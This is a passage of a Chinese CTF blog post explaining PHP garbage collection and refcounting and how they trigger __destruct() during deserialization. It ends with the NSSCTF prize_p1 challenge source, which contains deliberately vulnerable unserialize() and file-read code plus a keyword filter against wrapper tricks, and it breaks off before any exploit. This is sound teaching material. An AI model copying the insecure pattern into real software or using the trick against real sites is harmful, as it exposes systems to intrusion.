<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
        
      <meta name="description" content="本网站是个人兴趣爱好，总结分享经验，记录生活点滴的平台，希望在以后的学习旅途中，走出自己的风景。" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>php的垃圾回收(GC)机制介绍以及在phar反序列化中的一些利用 |  n0rt6&#39;s bolg</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.jpg" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--点击爱心-->
<script type="text/javascript" src="\js\clickLove.js"></script>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-php的垃圾回收-GC-机制介绍以及在phar反序列化中的一些利用"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  php的垃圾回收(GC)机制介绍以及在phar反序列化中的一些利用
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/07/17/php%E7%9A%84%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6-GC-%E6%9C%BA%E5%88%B6%E4%BB%8B%E7%BB%8D%E4%BB%A5%E5%8F%8A%E5%9C%A8phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%AD%E7%9A%84%E4%B8%80%E4%BA%9B%E5%88%A9%E7%94%A8/" class="article-date">
  <time datetime="2023-07-17T12:40:11.000Z" itemprop="datePublished">2023-07-17</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E7%9F%A5%E8%AF%86%E7%82%B9/">知识点</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">3.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">15 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <meta name="referrer" content="no-referrer"/>

<h2 id="php的垃圾回收-GC-机制介绍以及在phar反序列化中的一些利用"><a href="#php的垃圾回收-GC-机制介绍以及在phar反序列化中的一些利用" class="headerlink" title="php的垃圾回收(GC)机制介绍以及在phar反序列化中的一些利用"></a>php的垃圾回收(GC)机制介绍以及在phar反序列化中的一些利用</h2><h2 id="析构函数-destruct"><a href="#析构函数-destruct" class="headerlink" title="析构函数__destruct()"></a>析构函数__destruct()</h2><p>当一个程序结束后php会自动销毁，最后再调用一次<code>__destruct()</code>。也就是说创建了一个对象的话，程序结束后就会被销毁，在结束时会调用一次以上<code>__destruct()</code>。如果要触发<code>__destruct()</code>的话，要么对象为<code>null</code>,要么php的生命周期结束，要么给定的变量被unset()销毁。那么如果程序还没有运行结束的话，在运行中抛出异常或者程序报错则不会触发<code>__destruct()</code>，这里就要提到GC回收机制。</p>
<h2 id="GC机制官方文档"><a href="#GC机制官方文档" class="headerlink" title="GC机制官方文档"></a>GC机制<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/features.gc.php">官方文档</a></h2><p>也就是垃圾回收机制，在php，python，java，c# 等中都有存在。</p>
<p>GC机制，能够销毁内存空间，防止内存溢出，在PHP中使用<strong>引用计数</strong>和<strong>回收周期</strong>来自动管理内存对象，当一个变量被设置为NULL或者没有指针指向时它就会变成垃圾被GC机制自动回收掉；当对象没有被引用时，也会被回收，在这个过程中，会自动调用对象中的<code>__destruct()</code>。</p>
<h3 id="引用计数"><a href="#引用计数" class="headerlink" title="引用计数"></a>引用计数</h3><p>每一个php变量存在一个叫做zval的变量容器，一个zval变量容器包含变量的类型和值，还包括两个字节的额外信息—<code>is_ref</code>和<code>refcount</code>。</p>
<p><code>is_ref</code>是个bool值，用来标识变量是否是引用集合，通过这个字节，php引擎才可以把普通变量和引用变量区分开来。php它允许用户通过<code>&amp;</code>来自定义引用，并且zval变量容器中还有一个内部引用计数机制用来优化内存的使用。</p>
<p><code>refcount</code>表示有多少个变量名指向zval容器，也就是指向这个zval变量容器的变量个数。</p>
<p>我们可以使用xdebug来检查引用计数的情况<br> <img src="https://img-blog.csdnimg.cn/32b4413f344d4a71bbdaed0f95532c0b.png" alt="1"></p>
<p>引用例子：</p>
<p>在php5.6.9下运行</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"new string"</span><span class="token punctuation">;</span>
<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">unset</span><span class="token punctuation">(</span> <span class="token variable">$b</span><span class="token punctuation">,</span> <span class="token variable">$c</span> <span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//销毁$b,$c变量</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span><span class="token operator">=</span><span class="token operator">&amp;</span><span class="token variable">$a</span><span class="token punctuation">;</span><span class="token comment">//引用变量</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在php5.6.9下运行得到结果</p>
<blockquote>
<p>a: (refcount&#x3D;3, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’&#x2F;&#x2F;b,b,c被销毁后就剩一个a指向zval容器a:(refcount&#x3D;2,isref&#x3D;1)&#x3D;′newstring′&#x2F;&#x2F;a指向zval容器a:(refcount&#x3D;2,isr​ef&#x3D;1)&#x3D;′newstring′&#x2F;&#x2F;b引用了a的地址，那么a的地址，那么b就是引用变量</p>
</blockquote>
<p>在php7.3.4下运行得到结果</p>
<blockquote>
<p>a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;2, is_ref&#x3D;1)&#x3D;‘new string’&#x2F;&#x2F;b引用了b引用了a的地址，那么$b就是引用变量</p>
</blockquote>
<p>注意：</p>
<p>在php7开始，$c &#x3D; $b &#x3D; $a之后a的引用变量也是1。</p>
<p>在PHP 7中，zval可以被引用计数或不被引用，在zval结构中有一个标志确定了这一点。</p>
<p>①对于null，bool，int和double的类型变量，refcount不会计数；</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token constant">null</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span><span class="token operator">=</span><span class="token constant boolean">true</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'b'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$d</span><span class="token operator">=</span><span class="token number">1.1</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'d'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>php7.3.4运行结果：</p>
<blockquote>
<p>a: (refcount&#x3D;0, is_ref&#x3D;0)&#x3D;NULL<br> b: (refcount&#x3D;0, is_ref&#x3D;0)&#x3D;TRUE<br> c: (refcount&#x3D;0, is_ref&#x3D;0)&#x3D;1<br> d: (refcount&#x3D;0, is_ref&#x3D;0)&#x3D;1.1</p>
<p>refcount值都为0</p>
</blockquote>
<p>php5.6.9运行结果</p>
<blockquote>
<p>a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;NULL<br> b: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;TRUE<br> c: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;1<br> d: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;1.1</p>
<p>refcount值都为1</p>
</blockquote>
<p>②对于对象，refcount计数和php5的<strong>一致</strong>；</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">sd</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$s</span><span class="token operator">=</span><span class="token string single-quoted-string">'1'</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$a</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">sd</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span><span class="token operator">=</span><span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>php7.3.4运行结果：</p>
<blockquote>
<p>a: (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;class sd { public $s &#x3D; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘1’ }</p>
</blockquote>
<p>php5.6.9运行结果：</p>
<blockquote>
<p>a: (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;class sd { public $s &#x3D; (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;‘1’ }</p>
<p>可以发现，两个refcount结果一样</p>
</blockquote>
<p>③对于字符串;</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"new string"</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">unset</span><span class="token punctuation">(</span> <span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token operator">&amp;</span><span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>php7.3.4运行结果：</p>
<blockquote>
<p>a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;2, is_ref&#x3D;1)&#x3D;‘new string’</p>
</blockquote>
<p>php5.6.9运行结果：</p>
<blockquote>
<p>a: (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘new string’<br> a: (refcount&#x3D;2, is_ref&#x3D;1)&#x3D;‘new string’</p>
</blockquote>
<p>④对于数组，未引用的变量被称为“不可变数组”。其数组本身计数与php5一致，但是数组里面的每个键值对的计数，则按前面三条的规则；</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'b'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$d</span><span class="token operator">=</span><span class="token variable">$c</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string single-quoted-string">'c'</span><span class="token punctuation">;</span><span class="token comment">//数组值改变以后，之前的引用全部废弃，重新计算</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string single-quoted-string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>php7.3.4运行结果：</p>
<blockquote>
<p>c: (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;array (0 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘a’, 1 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘b’)<br> c: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;array (0 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘a’, 1  &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘b’, 2 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘c’)</p>
</blockquote>
<p>php5.6.9运行结果：</p>
<blockquote>
<p>c: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;array (0 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘a’, 1 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘b’)<br> c: (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;array (0 &#x3D;&gt; (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;‘a’, 1  &#x3D;&gt; (refcount&#x3D;2, is_ref&#x3D;0)&#x3D;‘b’, 2 &#x3D;&gt; (refcount&#x3D;1, is_ref&#x3D;0)&#x3D;‘c’)</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/22e913ea4a704047b26b0700fbfbafba.png" alt="1"></p>
<h3 id="回收周期"><a href="#回收周期" class="headerlink" title="回收周期"></a>回收周期</h3><p>php的垃圾回收机制是默认打开的，在php.ini中可以修改它<code>zend.enable_gc</code>，或者在运行php时分别调用gc_enable() 和 gc_disable()函数来打开和关闭垃圾回收机制。</p>
<p><img src="https://img-blog.csdnimg.cn/612b08fded7346268103c89b188ad14a.png" alt="请添加图片描述"></p>
<p>首先，需要确立一些基本规则。如果 refcount <strong>增加</strong>，则该变量仍在使用中，因此不是垃圾。如果 refcount    <strong>减少到 0</strong>，则 zval 可以释放。这意味着只有当引用计数参数减少到非零值时，才能创建垃圾循环。其次，在垃圾循环中，可以通过检查是否可以将 refcount 减少 1，并检查哪些    zval 的 refcount 为 0 来确定哪些部分是垃圾。</p>
<h2 id="GC机制的实际工作"><a href="#GC机制的实际工作" class="headerlink" title="GC机制的实际工作"></a>GC机制的实际工作</h2><p>那么GC回收机制在ctf中该怎么利用呢？上面说到PHP的魔术方法<code>__destruct()</code>函数在程序结束后会自动调用<code>__destruct()</code>函数进行自动销毁，但是程序报错或者异常终止就不会触发该函数。</p>
<p>一段代码：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">czy</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token variable">$test</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span> <span class="token operator">=</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span><span class="token operator">.</span><span class="token string double-quoted-string">"我是__construct"</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span><span class="token operator">.</span><span class="token string double-quoted-string">"我是__destruct"</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//直接new一个对象创建类，并没有进行指向</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">//程序运行结束后会销毁所有对象，就会触发__destruct();</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img-blog.csdnimg.cn/96d1a112806f4e149dede4669e5697b4.png" alt="请添加图片描述"></p>
<p>从运行的结果可以看到1就直接触发<code>__destrcut()函数</code>被当作垃圾给回收了。而1和2则是在创建完之后没有操作了才正常结束。</p>
<p>那么如果正常指向，然后后面再指向对象的时候忽然指向其他的，就是舍弃对象，那么又会发生什么呢？</p>
<p>一段代码：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">czy</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token variable">$test</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span> <span class="token operator">=</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span><span class="token operator">.</span><span class="token string double-quoted-string">"我是__construct"</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span><span class="token operator">.</span><span class="token string double-quoted-string">"我是__destruct"</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$c</span><span class="token operator">=</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token comment">//舍弃对象</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">czy</span><span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img-blog.csdnimg.cn/10a042c5408c40bdb0b228566880b9f3.png" alt="请添加图片描述"><br> 对象czy被new了之后却被赋值为4，也就是new czy(1)执行是NULL，触发<code>__destruct()</code>当成垃圾被回收，也就成功执行了<code>__destruct()</code>里的语句，这是一个可用点。</p>
<p>如果我们注释掉<code>$c[0]=$c[1];//舍弃对象</code>：<br> <img src="https://img-blog.csdnimg.cn/f4192d1071814468b09e4daffcbf8377.png" alt="请添加图片描述"></p>
<p>拿着就是正常创建，正常销毁。</p>
<h2 id="结合题目"><a href="#结合题目" class="headerlink" title="结合题目"></a>结合题目</h2><p>这里我选了一个比较典型的题目<strong>NSSCTF prize_p1</strong><a target="_blank" rel="noopener" href="https://www.ctfer.vip/problem/14">题目地址</a></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>META</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">content</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text/html; charset=utf-8<span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span>

<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">getflag</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token function">getenv</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"FLAG"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name-definition class-name">A</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$config</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">config</span> <span class="token operator">==</span> <span class="token string single-quoted-string">'w'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"./tmp/a.txt"</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">config</span> <span class="token operator">==</span> <span class="token string single-quoted-string">'r'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
            <span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"那么就从这里开始起航吧"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>flag在环境变量里。</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"那么就从这里开始起航吧"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//注意到这里扔出异常，那就想到今天讲的GC机制了。</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在题目里也看到了</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"./tmp/a.txt"</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
以及
